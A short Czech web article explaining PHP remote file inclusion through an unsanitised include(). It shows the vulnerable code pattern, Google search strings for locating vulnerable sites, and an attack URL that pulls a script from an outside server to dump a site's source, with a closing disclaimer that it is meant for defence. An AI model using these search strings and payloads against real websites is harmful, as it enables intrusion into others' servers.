PHP Injection nebo PHP Include, anebo také PHP injekce, je zjednodušeně řečeno zneužití PHP funkce include(). Jedná se o poměrně častou chybu webmasterů, která dává útočníkovi možnost uploadovat na server svůj skript, útočník tak může získat nad webem silnou kontrolu – mazat, editovat, přidávat soubory…
Takto vypadá napadnutelná webová stránka: http://www.mozektevidi.cz/index.php?promenna=stranka.php *
*stranka.php může mít také přípony: html, htm
Pokud je web napadnutelný, tak „uvnitř“ vypadá takto: <? include($promenna); ?>
Příklad: vložte do vyhledávače: http://www.mozektevidi.cz/index.php?page=http://google.com **
**Pokud by se vám v prohlížeči objevila stránka Google.com, tak je stránka Google.com napadnutelná.
Vyhledávání napadnutelných webů
K vyhledávání napadnutelných webů se používá fulltextový vyhledávač Google.com. Jedná se např. o řetězce:
- inurl:“mozektevidi.cz/*.php?page=*.php“
- inurl:index.php?include=
- inurl:index.php?id=
- inurl:index.php?page=
- atd.
K výpisu kódu je zapotřebí jednoduchý PHP script, který se uloží někam na server, např. na freehosting. Pokud má váš web bezpečnostní trhlinu, tak doplňte do vaší URL adresy toto: http://www.mozektevidi.cz/index.php?page=http://serversescriptem.cz/script.txt
To je vše – zobrazí se zdrojový kód index.php a váš web je HACKED BY! Proto velký pozor na tuto často vyskytující se chybu.
UPOZORNĚNÍ!
Tento článek slouží k zabezpečení, vyvarování se chyb vlastních webových stránek před PHP injection. V žádném případě se nejedná o návod, jak zneužívat cizí weby!
Veškerý obsah, na Mozektevidi.cz, je zakázáno dále šířit (přebírat)! Nepřeji si dále šířit (přebírat) i tento článek! Admin.
